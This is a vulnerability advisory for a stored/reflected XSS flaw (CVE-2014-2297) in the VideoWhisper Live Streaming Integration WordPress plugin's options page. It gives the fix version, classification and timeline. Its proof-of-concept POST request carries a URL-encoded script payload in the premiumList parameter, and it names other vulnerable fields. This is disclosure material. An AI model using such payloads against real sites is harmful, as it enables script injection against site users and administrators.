VideoWhisper Live Streaming Integration 4.29.6 – videowhisper_streaming.php Multiple Parameter XSS | CVE 2014-2297 | Plugin Vulnerabilities

Description

The plugin was affected by multiple XSS issues in its options page

Proof of Concept

POST /wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
[...]

premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes


Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth

Affects Plugins

videowhisper-live-streaming-integration

Fixed in 4.29.10

References

CVE

URL

https://packetstormsecurity.com/files/#125430/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

HauntIT

Verified

No

WPVDB ID

03ce1e40-79fa-40c8-9f68-89e4451082e8

Timeline

Publicly Published

2014-02-26 (about 12 years ago)

Added

2014-08-01 (about 11 years ago)

Last Updated

2021-04-13 (about 5 years ago)

Other

Published

Title

Published

2025-11-10

Title

Woocommerce – Products By Custom Tax <= 2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2024-07-10

Title

FULL < 3.1.13 - Unauthenticated Stored Cross-Site Scripting via License Plan Parameter

Published

2015-08-13

Title

WP Job Manager < 1.23.8 - Reflected Cross-Site Scripting (XSS)

Published

2025-02-03

Title

Eventer < 3.9.9.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2022-03-08

Title

Ninja Forms File Uploads Extension < 3.3.13 - Unauthenticated Stored Cross-Site Scripting